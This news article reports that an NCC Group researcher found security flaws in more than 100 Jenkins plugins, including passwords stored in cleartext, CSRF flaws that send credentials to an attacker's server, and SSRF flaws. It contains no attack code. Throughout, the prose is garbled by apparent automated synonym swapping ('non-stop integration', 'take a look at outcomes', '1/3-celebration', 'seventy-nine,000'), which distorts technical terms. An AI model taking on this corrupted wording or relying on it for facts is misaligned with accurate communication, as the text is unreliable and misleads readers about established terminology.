Security flaws in one hundred+ Jenkins plugins put employer networks at risk

A security researcher has located and mentioned safety flaws in more than one hundred special Jenkins plugins over the past 18 months, and despite efforts to inform builders, many of those plugins have no longer acquired a fix.

The Jenkins crew has issued ten security advisories about these vulnerabilities in the ultimate 18 months, warning builders to uninstall inclined extensions [1, 2, 3, 4, 5, 6, 7, 8, 9, 10].

NCC Group Security Consultant Viktor Gazdag is credited with coming across all the vulnerabilities, all of which impact plugins for Jenkins, a not unusual web-primarily based software utilized by developer groups.

Jenkins, that is coded in Java, works as a non-stop integration/deployment system that allows dev teams to run computerized assessments and execute diverse operations primarily based on take a look at outcomes, which includes deploying new apps and code to manufacturing servers.


Because of it is beneficial trying out and automation capabilities, Jenkins is wildly popular –in the corporation zone, in particular– with nearly seventy-nine,000 instances, in step with Shodan, a seek engine for discovering internet-related systems.

Just like with any modern-day net application, Jenkins’ standard characteristic set can be prolonged thru plugins, and like with most open-source initiatives, the massive majority of Jenkins plugins have been created by third-celebration builders.

Unfortunately, much like what takes place with most open-source tasks nowadays, developers cannot provide a guide for their code indefinitely, and some of these plugins were abandoned, with no person left to provide help.

Now, Gazdag is caution owners of Jenkins structures that some of these abandoned plugins may additionally come to be putting company structures at risk, due to unpatched security flaws, some of which can be extremely dangerous.


The NCC Group researcher said that some of the maximum commonplace safety flaw he located become that many Jenkins plugins saved passwords in cleartext interior their configuration files, in place of use the primary Jenkins credentials.Xml report, which robotically encrypts all data stored interior it.

For example, if a plugin designed to interconnect Jenkins systems with 1/3-celebration era, like a database, a message broking (MQ) server, or a cloud issuer, did not encrypt the password internal its config report, an attacker who managed to retrieve these statistics would be granted easy get entry to to the one’s systems as properly.

Furthermore, Gazdag additionally found CSRF (Cross-Site Request Forgery) flaws that allowed risk actors to use plugins’ “connection check” capabilities to send credentials to an attacker’s server, and SSRF (Server-Side Request Forgery) flaws that allowed risk actors to post-test and map businesses’ inner networks, or brute-force login credentials.

In the past, Jenkins structures have been centred by using cryptocurrency-mining botnets, but most of the vulnerabilities Gazdag located may not be appropriate for computerized assaults.

Instead, these flaws are ideal for reconnaissance operations and targeted assaults, which many of the businesses that use Jenkins structures typically try to avoid with a better priority than a low-significance crypto-mining malware infection.

Last yr, safety researchers from CyberArk additionally located two vulnerabilities that let anonymous users emerge as Jenkins admins.

Ashley Stephens

Read Previous


Read Next

18 Helpful Plugins for WordPress Multisite Networks